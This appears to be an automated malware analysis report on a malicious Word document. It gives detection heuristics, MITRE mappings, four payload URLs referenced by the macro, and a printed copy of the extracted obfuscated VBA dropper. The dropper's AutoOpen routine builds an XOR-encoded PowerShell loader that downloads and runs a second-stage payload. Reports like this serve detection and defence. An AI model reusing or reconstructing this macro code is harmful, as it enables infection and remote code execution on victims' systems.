MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers the execution of WScript.Shell and CreateObject, indicating an attempt to download and execute a secondary payload. The presence of these calls strongly suggests a dropper or downloader functionality.
Heuristics 11
-
ClamAV: Doc.Dropper.Agent-6599063-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6599063-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
JPUnS = 82612 * iirfr / UQEuI + AdcTnq - 67285 * dctOi / zJinwR * ShUQHi / biVjl - Hkjwhz iwGIOiRwMkL = lkiSMACw + CreateObject("Wscript.shell").Run(jHNhwM + Chr(vbKeyP) + DQUHLNp + Chr(vbKeyO) + RdEBTKYSE + zBqAYAw, 353871513 - 353871513) zzhvK = 97054 * iLQdP / QzOtB + irTYFs - 10022 * JEUjC / DrQiFt * mQNYud / ZbqIuz - OjYcD -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
JPUnS = 82612 * iirfr / UQEuI + AdcTnq - 67285 * dctOi / zJinwR * ShUQHi / biVjl - Hkjwhz iwGIOiRwMkL = lkiSMACw + CreateObject("Wscript.shell").Run(jHNhwM + Chr(vbKeyP) + DQUHLNp + Chr(vbKeyO) + RdEBTKYSE + zBqAYAw, 353871513 - 353871513) zzhvK = 97054 * iLQdP / QzOtB + irTYFs - 10022 * JEUjC / DrQiFt * mQNYud / ZbqIuz - OjYcD -
Payload URL decoded from an encoded PowerShell loader (4 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "FEEBoIpEBPl" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.chixg.com/hciyoer/U/ Referenced by macro
- http://baute.org/64/Referenced by macro
- http://redwire.us/wordprss/hSbhW/Referenced by macro
- http://www.wheelhousela.com/pBwINgH8/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7466 bytes |
SHA-256: 292c24fbb3ab44c643b4ec187bc19907d3381ab81b638e81cff7b38e380cccbc |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
112 of 200 identifiers look randomly generated (e.g. 'OpalTzKpkJq') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "HiKSikzURWz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "FEEBoIpEBPl"
Sub AutoOpen()
On Error Resume Next
VGZII = (jfXHGQ / amHccf + (wdzuF - JRpKpC + ftGlVp + 13711 * Wdjzqt * CHUju))
XsGiC = (jPpNR / pTjfV + (nYVZA - vPGoO + qJHGHB + 386 * TfXah * RwAZo))
Awnki = (jYzpz / Gbfhw + (rAMrFG - HwdHz + NLdwA + 43293 * ArFGs * pPwIaj))
NKrYZ = (VEGHsk / XwJMu + (KbCUVq - fYVSq + wwSpzX + 6090 * PDDBRn * EfQNz))
mNtWz = (sqjnDv / HWIvi + (ifOnH - uskwz + jzrvc + 31863 * HJJJXf * cZZtJA))
pqLpV = 64814 * GwjnR / lcEHJ + qMvYwT - 8644 * BasEF / WIGHzd * lXSTPk / BiAYH - IFuRM
vBrZwF (KRXCuoG + NzJbCCwTIE + liPssr)
pQPjC = 56182 * njwOP / XLdOW + VGhBv - 53967 * qlicj / HiWPJc * oHmSR / zcQPz - lhMwIO
RiQjE = 59487 * ZhdVzH / wFpcEj + rBXZUz - 61881 * RNpudM / VrOoh * fYIDR / ZCPSMd - actHkh
EmmhF = 14060 * jIXAv / mVONU + jrioa - 44094 * zwwuiN / pXNBa * LDUoEP / isPTw - ticZwM
End Sub
Function vBrZwF(RdEBTKYSE)
On Error Resume Next
RiSXR = 32088 * XYbArp / TiiEb + WlRdXI - 27033 * nIuzH / JiJBi * QjmNq / PUvTd - dFnjQ
VJPmN = 78043 * uiOHMn / CjXqjK + EFjdw - 12432 * WNzPp / LCoha * cZziI / LprwE - OBHQEj
zICrkP = 63971 * jSFkY / WNKmwD + RttETf - 65841 * CkcRT / ZKYzX * nXwOLv / pPuBi - DiPJm
OnGlBA = 7053 * qvEhtB / DzrzTn + NfsXs - 80107 * aaQPCc / UHLHL * wIkkk / LDHmaj - zabtdI
kzihi = 56271 * EawCm / bXztwi + XisEHi - 89105 * QTKBl / mhEpOl * qatNIP / pDoSi - tGGiZz
JPUnS = 82612 * iirfr / UQEuI + AdcTnq - 67285 * dctOi / zJinwR * ShUQHi / biVjl - Hkjwhz
iwGIOiRwMkL = lkiSMACw + CreateObject("Wscript.shell").Run(jHNhwM + Chr(vbKeyP) + DQUHLNp + Chr(vbKeyO) + RdEBTKYSE + zBqAYAw, 353871513 - 353871513)
zzhvK = 97054 * iLQdP / QzOtB + irTYFs - 10022 * JEUjC / DrQiFt * mQNYud / ZbqIuz - OjYcD
kvCpcz = 84313 * KhRzq / ivIDjH + fuGNd - 82301 * NdmGzh / WfinJ * NQBEiu / YoYtBp - FBvcz
pziqj = 51808 * TZjjnH / wbGAKO + khOMpE - 44427 * LrFBov / lWrTBL * uJUmDT / ZYSpfF - QirWF
End Function
Function KRXCuoG()
On Error Resume Next
tziYS = (BfzHkb + 22700)
shdMR = vHAnP / 37979 + 92804 / uAOjY / 88592 / NJLPQ / zzQME * znJqw
fplab = (JfwHEr + 96171)
piGKpYD = "wers" + "hell " + " " + " -J" + "oIn" + Chr(40) + "'40K" + "97j8" + "8j71," + "49t9" + "8%105&123" + "!33,99" + "t110o102%" + "105K11"
VzrdqA = (sjkWuZ + 72885)
wNlKS = (tFZni + 33265)
kVpuY = (wJCJl + 46111)
XBJVqvp = "1K120~44," + "66t105%1" + "20,34" + "t91~105K1" + "10,79~9" + "6o101j105" + "t98j120&5"
kTAzc = (VfSvXG + 8208)
nXqpA = (RKHMLM + 25088)
tEAmT = (tNvzii + 25397)
FNwjjWlKU = "5o40~70" + ",78t12" + "3&49," + "43j1" + "00%120" + "%120@" + "124K54@3" + "5@35" + "t123!1" + "23!123o"
PNmEd = (SuMdKE + 95602)
jRinVk = (jWHFvS + 50642)
tHSfQZ = (LMjamO + 74229)
IDNuczV = "34~1" + "11o100o10" + "1%116t1" + "07&34" + "o111%99~" + "97K35K1" + "00t11" + "1K10"
BFVqS = (CHsKO + 30965)
thTuDY = (EanPvF + 33860)
vzatR = (rJOwwb + 24603)
LwnPNhDs = "1o117K" + "99t105" + "&126" + "!35&89@3" + "5%76o" + "100~120t" + "120K124,"
BoFPfB = (FKZOXa + 42978)
mwoiZ = (qRjkL + 61490)
BXEwH = (bzYhuF + 75042)
oPbfXaTmto = "54@35o35t" + "110@109o" + "121!120" + ",105" + "K34%99%1" + "26~107%35" + "!58!5" + "6,35j"
kjXFLD = (kvWjX + 72994)
VVJKQR = (CtDRoL + 26621)
ucmCo = (aUfiUw + 25039)
sGHvS = "76!10" + "0@120" + "K120,124@" + "54~35&35t" + "126K105t" + "104t1" + "23,101"
KRXCuoG = piGKpYD + XBJVqvp + FNwjjWlKU + IDNuczV + LwnPNhDs + oPbfXaTmto + sGHvS
JjPWR = (PHRRzF + 37765)
MNNVr = (flkXhK + 90371)
ifvVR = (JTujz + 20784)
End Function
Function NzJbCCwTIE()
On Error Resume Next
MOwQzY = (UuLwC + 92047)
wzAXBI = (GPaKF + 28429)
sTdVj = (WEVAPS + 60970)
fTomO = "o126,105~" + "34%121K12" + "7t35%123" + "&99j126" + ",104%124" + "&126t12" + "7&127~" + "35&10" + "0&95K"
XZRXdr = (njoDp + 36544)
RoLMc = (PwndY + 61593)
tizHic = (uBiuH + 82118)
adowF = "110&1" + "00&91j35K" + "76%100!1" + "20!12" + "0K124@" + "54~35,35,"
GzKDs = (ljaLD + 79798)
OaSrRv = (quEQa + 61144)
QKREm = (rYWGv + 77469)
ZHaYO = "61K62o62%" + "34j6" + "1o57,57" + "j34@61" + "@53&59" + "%34,61%" + "62!3" + "5j123~105" + ",110~35~" + "89@88%77"
pwOPqs = (tIzrc + 96769)
bhfNGD = (KXVXz + 7005)
npEMwd = (JsjAXR + 89033)
ZdbHKhlMIo = "&35K76~10" + "0~120&1" + "20%124" + ",54K35j35" + "j123,123t" + "123~34~1" + "23j100" + "%105&105t" + "96o100@99" + "&121K1" + "27&10"
NEBnaQ = (viGwlU + 98944)
cnEpKw = (VzGLJR + 78836)
MjmRih = (IjMFd + 92805)
UhNVLYj = "5o96K109~" + "34K111,9" + "9~97,35,1" + "24o7" + "8K123t6" + "9%66o10" + "7&68!5" + "2o35o43,3" + "4t95j124"
fVzMX = (jfiIw + 98963)
DhaUz = (PFKPCE + 59108)
cFUuZ = (CKVrYz + 32388)
PwBizBintpA = "!96!" + "101%" + "120~36,4" + "3&76," + "43&37j" + "55!40@11" + "8!125" + "@66@4" + "4~49o44~" + "43o56~61!" + "59!43@55"
NzJbCCwTIE = fTomO + adowF + ZHaYO + ZdbHKhlMIo + UhNVLYj + PwBizBintpA
aMwaoD = (zTMiq + 91882)
wqYYLR = (FBbquN + 10338)
LjwzfO = (pRpjd + 78341)
End Function
Function liPssr()
On Error Resume Next
OPjPp = (vuKWW + 64030)
uHSKwn = (vMAUj + 47955)
Giinm = (bPuTY + 3676)
woFaM = "!40t99t85" + "~70o" + "49@40!105" + "K98@122j5" + "4%120t105" + ",97t124@3" + "9&43%" + "80!43" + "!39t40j" + "118j125" + "%66j39,43"
dGwMI = (kfwPw + 25806)
dizvG = (iSqki + 90183)
mDiMw = (uOEjdl + 58983)
wAVhLL = "!34,1" + "05t1" + "16&105&4" + "3@55&106%" + "99&126" + "j105&109"
HHPNl = (WHjBc + 32406)
XGYiB = (lfrPz + 46011)
nnZwWK = (pALuYZ + 77740)
KiBhjRHwiF = "&111K1" + "00%36o40%" + "101j88@10" + "1@44@101" + "~98&" + "44%40o70j" + "78~123&"
jswut = (EOUwkC + 40622)
lmqwoX = (zFwto + 72391)
WvdFbf = (XkAkm + 32156)
KNfJwNZYpb = "37o119,12" + "0o126o117" + "o119" + "t40~97," + "88!71" + "j34@72" + "@99K" + "123%"
IahVZ = (vVbiL + 74732)
BIWYz = (ALCvAk + 53077)
CqOBH = (RNBwv + 6290)
ArDSDkpFRL = "98~96,99@" + "109%104" + "!74t1" + "01,96j105" + "t36j40@10" + "1&88" + "@101!" + "32,44K4" + "0!99K" + "85t70"
raLCOj = (zWAFmw + 65972)
QUqBtI = (qLiij + 90100)
EoGXd = (RrlUab + 49992)
Xziizk = "@37%55" + "o95%" + "120~1" + "09,126j1" + "20,33o9" + "2j126,9" + "9@111j" + "105K1"
Sqzju = (VnzhoL + 11786)
vzmisq = (UHhqIZ + 66972)
bRiaw = (TfUNfH + 35393)
HBCNudNVCR = "27,127!" + "44t40,99j" + "85&70K55&" + "110t126~1" + "05~1" + "09!103,55" + "%113" + "&111!" + "109!120!1" + "11o1"
nTBln = (PKwpSt + 34243)
VYYNO = (ZnEVj + 23772)
URQMjO = (pqqZi + 87067)
PsPCjqj = "00t119!11" + "3~113'.S" + "pliT" + Chr(40) + " '%," + "tKo&!j~" + "@' " + Chr(41) + "|foR"
Vauqw = (KEMazj + 352)
imizhN = (WhUFw + 84593)
ihwiV = (lTDjvh + 25462)
kjqcuKi = "EACh-" + "oBJeCT{" + " [ChAR" + "]" + Chr(40) + "$_" + " -BXOr" + " 0x0c " + Chr(41) + " } " + Chr(41) + "| ." + Chr(40) + " " + "$SHELlid" + "[1]" + Chr(43) + "$sH" + "ELLiD[13" + "]" + Chr(43) + "'x'" + Chr(41) + " "
liPssr = woFaM + wAVhLL + KiBhjRHwiF + KNfJwNZYpb + ArDSDkpFRL + Xziizk + HBCNudNVCR + PsPCjqj + kjqcuKi
VYloz = (jWDFv + 25243)
mjjqm = (fOrkX + 34761)
LjuDAz = (AHaPAL + 8924)
End Function
Attribute VB_Name = "OpalTzKpkJq"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.